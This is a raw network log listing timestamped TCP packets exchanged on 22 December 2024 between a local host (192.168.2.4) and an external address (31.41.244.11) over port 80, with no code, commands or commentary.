                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.988179922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.988203049 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.988228083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.988925934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989006042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989049911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989087105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989110947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989136934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989800930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989878893 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989928007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989963055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.989986897 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.990005016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.990684032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.990756989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.990968943 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991028070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991095066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991128922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991147041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991175890 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991878033 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.991940975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992064953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992101908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992166042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992741108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992877960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992913961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992958069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.992985964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.993709087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.993818998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.993855000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.993899107 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.993946075 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994532108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994600058 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994668007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994704008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994724035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.994754076 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995404959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995474100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995542049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995579958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995599985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.995625973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996310949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996377945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996439934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996474981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996500015 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.996521950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997200012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997273922 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997358084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997397900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997412920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.997534990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998094082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998163939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998208046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998244047 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998270988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.998291969 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005172968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005227089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005264997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005279064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005305052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005306005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005325079 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005347013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005363941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005388021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005397081 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.005491018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.006289959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.006372929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162563086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162616014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162652016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162676096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162688017 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162713051 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162728071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162751913 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162767887 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162790060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162791014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.162843943 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163630009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163683891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163703918 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163727045 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163753986 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.163800955 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164542913 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164594889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164611101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164637089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164645910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.164695978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165142059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165242910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165249109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165287971 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165303946 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.165339947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166024923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166080952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166112900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166152000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166168928 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166217089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166889906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.166940928 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167048931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167084932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167104006 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167128086 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167798996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167856932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167876005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167912960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167927980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.167958975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168665886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168719053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168772936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168808937 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168828011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.168859005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.169612885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.169668913 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.169670105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.169706106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.169750929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.170454979 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.170562029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.170598030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.170618057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.170641899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.171407938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.171463013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.171499014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.171516895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.171536922 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.172235966 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.172287941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.172333956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.172369003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.172384977 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173106909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173162937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173209906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173245907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173299074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.173989058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174089909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174124956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174144983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174168110 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174887896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.174998999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175034046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175050020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175786972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175898075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175904036 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175935984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.175946951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.176660061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.176707029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.176772118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.176826954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.176878929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.177546024 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.177599907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.177663088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.177697897 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.177750111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.178452969 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.178579092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.178613901 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.178657055 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.178673029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.179335117 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.179431915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.179466963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.179495096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.179533005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.180238008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.180303097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.180336952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.180362940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.180393934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.181098938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.181210995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.181262016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.181267977 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.181988955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182025909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182056904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182107925 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182142973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182200909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.182867050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.183196068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.183260918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.183260918 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.183295965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.183329105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184051037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184111118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184166908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184205055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184262991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.184946060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185005903 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185059071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185096979 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185156107 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185832024 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185933113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185967922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.185993910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186026096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186743021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186816931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186830997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186883926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.186954021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.187613010 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.187717915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.187758923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.187771082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.187808037 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.188498974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.188611031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.188647985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.188663960 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.188693047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.189403057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.189502001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.189539909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.189551115 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190021038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190284014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190387011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190422058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190438032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.190458059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197149038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197304964 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197343111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197397947 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197432995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197469950 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.197721958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.198160887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.202042103 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354618073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354721069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354762077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354773045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354803085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354810953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354847908 CET804976531.41.244.11192.168.2.4
